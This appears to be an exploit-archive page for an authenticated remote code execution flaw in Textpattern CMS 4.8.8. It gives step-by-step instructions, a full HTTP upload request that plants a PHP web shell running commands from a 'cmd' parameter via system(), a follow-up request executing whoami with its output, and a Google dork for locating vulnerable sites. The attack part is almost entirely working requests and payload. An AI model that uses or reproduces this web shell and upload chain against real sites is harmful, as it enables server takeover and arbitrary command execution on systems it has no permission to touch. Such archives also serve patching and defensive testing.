Textpattern 4.8.8 Remote Code Execution

Textpattern 4.8.8 Remote Code Execution: Posted Mar 31, 2023; Authored by Alperen Ergel; Textpattern version 4.8.8 suffers from an authenticated remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 89d596b7562691bc5e3d1b701cec34938f03d197f1f7784c76de0061cdc011cc; Download | Favorite | View

Textpattern 4.8.8 Remote Code Execution

# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
#  Step 1: Login admin account and go settings of site
#  Step 2: Upload a file to web site and selecet the rce.php
#  Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########


========>>> START REQUEST <<<=========




############# POST REQUEST (FILE UPLOAD) ############################## (1)

POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close

------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"

1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"

async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"

file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"

file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"

16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--


############ POST RESPONSE (FILE UPLOAD) ######### (1)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8

___________________________________________________________________________________________________________________________________________________

############ REQUEST TO THE PAYLOAD ############################### (2)

GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close


############ RESPONSE THE PAYLOAD ############################### (2)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>alpernae\alperen
</pre>

========>>> END REQUEST <<<=========

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Textpattern 4.8.8 Remote Code Execution

Textpattern 4.8.8 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Textpattern 4.8.8 Remote Code Execution

Share This

Textpattern 4.8.8 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems